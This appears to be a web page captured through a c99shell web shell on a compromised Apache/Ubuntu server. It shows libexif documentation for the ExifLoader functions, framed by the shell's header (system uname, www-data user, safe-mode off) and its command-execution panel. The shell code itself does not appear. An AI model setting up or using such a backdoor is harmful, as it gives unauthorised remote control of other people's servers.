Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/libexif-doc/libexif-api.html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
Defines the ExifLoader type. More... Go to the source code of this file.
Detailed DescriptionDefines the ExifLoader type. Function Documentation◆ exif_loader_get_buf()
Return the raw data read by the loader. The returned pointer is only guaranteed to be valid until the next call to a function modifying this ExifLoader. Either or both of buf and buf_size may be NULL on entry, in which case that value is not returned.
◆ exif_loader_get_data()
Create an ExifData from the data in the loader. The loader must already contain data from a previous call to exif_loader_write_file or exif_loader_write.
References exif_data_load_data(), exif_data_log(), and exif_data_new_mem(). Referenced by exif_data_new_from_file(). ◆ exif_loader_log()
Set the log message object used by this ExifLoader.
◆ exif_loader_new()
Allocate a new ExifLoader.
References exif_loader_new_mem(), exif_mem_new_default(), and exif_mem_unref(). Referenced by exif_data_new_from_file(). ◆ exif_loader_new_mem()
Allocate a new ExifLoader using the specified memory allocator.
Referenced by exif_loader_new(). ◆ exif_loader_ref()
Increase the refcount of the ExifLoader.
◆ exif_loader_reset()
Free any data previously loaded and reset the ExifLoader to its newly-initialized state.
◆ exif_loader_unref()
Decrease the refcount of the ExifLoader. If the refcount reaches 0, the loader is freed.
Referenced by exif_data_new_from_file(). ◆ exif_loader_write()
Load a buffer into the ExifLoader from a memory buffer. The relevant data is copied in raw form into the ExifLoader.
◆ exif_loader_write_file()
Load a file into the given ExifLoader from the filesystem. The relevant data is copied in raw form into the ExifLoader.
Referenced by exif_data_new_from_file(). | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0082 ]-- |